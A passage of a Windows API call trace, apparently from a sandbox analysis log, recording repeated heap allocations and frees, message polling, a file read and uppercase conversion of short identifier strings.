Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0210.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0210.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50eb020 [0210.512] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.512] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x8c04, lpOverlapped=0x0) returned 1 [0210.514] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8c04) returned 0x2a9a940 [0210.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50eb020 | out: hHeap=0x2af0000) returned 1 [0210.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8c04) returned 0x2aae878 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8c04) returned 0x2a9a940 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0210.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0210.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.519] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0210.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8c04) returned 0x2a9a940 [0210.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8c04) returned 0x2ab7488 [0210.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.522] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0210.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0210.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0210.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0210.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0210.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.525] 